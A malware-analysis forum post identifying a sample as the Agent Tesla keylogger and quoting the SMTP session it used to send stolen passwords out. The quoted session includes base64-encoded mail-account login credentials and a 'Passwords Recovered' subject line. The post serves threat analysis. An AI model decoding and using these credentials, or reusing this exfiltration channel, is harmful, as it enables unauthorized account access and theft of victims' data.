A forum for reverse engineering, OS internals and malware analysis 

Agent Tesla keylogger

Forum for analysis and discussion about malware.

Re: Malware collection

 #30240  by Antelox
 Mon Apr 17, 2017 3:00 pm
ikolor wrote:next ..

https://www.virustotal.com/en/file/dbbc ... 492425361/
This is Agent Tesla keylogger. A sample of the email header sent containing exfiltred data:
EHLO [redacted]
AUTH login d2VibWFzdGVyQGFtY293ZWxkLmNvbS5teQ==
RWlnaHRpczg4
MAIL FROM:<webmaster@amcoweld.com.my>
RCPT TO:<webmaster@amcoweld.com.my>
DATA
MIME-Version: 1.0
From: webmaster@amcoweld.com.my
To: webmaster@amcoweld.com.my
Date: 17 Apr 2017 20:54:42 +0200
Subject: [redacted] Passwords Recovered From: [redacted] [Agent Tesla]
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
BR,

Antelox
 Return to “Malware”